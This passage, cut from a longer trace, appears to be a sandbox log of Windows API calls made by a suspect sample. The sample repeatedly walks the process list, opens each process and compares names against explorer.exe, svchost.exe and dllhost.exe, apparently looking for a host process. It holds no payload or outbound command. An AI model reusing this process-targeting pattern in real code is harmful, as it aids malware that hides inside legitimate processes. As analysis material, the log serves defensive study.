th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0184.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0184.168] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.168] CloseHandle (hObject=0xd8) returned 1 [0184.168] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0184.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0184.169] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.169] CloseHandle (hObject=0xd8) returned 1 [0184.169] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0184.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0184.169] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.169] CloseHandle (hObject=0xd8) returned 1 [0184.169] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0184.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0184.170] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.170] CloseHandle (hObject=0xd8) returned 1 [0184.170] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0184.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0184.171] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.171] CloseHandle (hObject=0xd8) returned 1 [0184.171] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0184.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0184.171] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.171] CloseHandle (hObject=0xd8) returned 1 [0184.171] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0184.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0184.172] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.172] CloseHandle (hObject=0xd8) returned 1 [0184.172] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0184.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0184.172] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.172] CloseHandle (hObject=0xd8) returned 1 [0184.172] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0184.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0184.173] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.173] CloseHandle (hObject=0xd8) returned 1 [0184.173] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0184.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0184.173] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.173] CloseHandle (hObject=0xd8) returned 1 [0184.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0184.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0184.174] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.174] CloseHandle (hObject=0xd8) returned 1 [0184.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0184.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0184.175] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.175] CloseHandle (hObject=0xd8) returned 1 [0184.175] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0184.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0184.175] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.175] CloseHandle (hObject=0xd8) returned 1 [0184.175] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0184.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0184.176] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.176] CloseHandle (hObject=0xd8) returned 1 [0184.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0184.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0184.176] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.176] CloseHandle (hObject=0xd8) returned 1 [0184.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0184.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0184.177] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.177] CloseHandle (hObject=0xd8) returned 1 [0184.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0184.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0184.178] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0184.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0184.178] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0184.179] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0184.179] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0184.180] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0184.180] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.180] CloseHandle (hObject=0xd8) returned 1 [0184.180] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0184.181] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0184.181] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.181] CloseHandle (hObject=0xd8) returned 1 [0184.181] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0184.181] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0184.181] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0184.181] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0184.182] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0184.182] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.182] CloseHandle (hObject=0xd8) returned 1 [0184.182] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0184.183] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.183] CloseHandle (hObject=0xd8) returned 1 [0184.183] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0184.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0184.183] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.183] CloseHandle (hObject=0xd8) returned 1 [0184.183] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.184] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0184.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0184.184] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0184.185] CloseHandle (hObject=0xd8) returned 1 [0184.185] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0184.185] CloseHandle (hObject=0xd4) returned 1 [0184.185] Sleep (dwMilliseconds=0x3e8) [0185.196] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0185.198] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0185.198] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0185.199] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0185.199] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0185.200] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0185.200] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0185.201] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0185.201] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0185.202] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0185.202] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0185.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0185.203] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0185.203] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0185.204] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0185.204] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0185.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0185.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0185.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0185.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0185.207] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0185.207] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.207] CloseHandle (hObject=0xd8) returned 1 [0185.207] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0185.207] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0185.208] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0185.208] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0185.208] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0185.209] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0185.209] CloseHandle (hObject=0xd8) returned 1 [0185.209] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0185.209] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0185.209] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0185.209] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0185.209] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 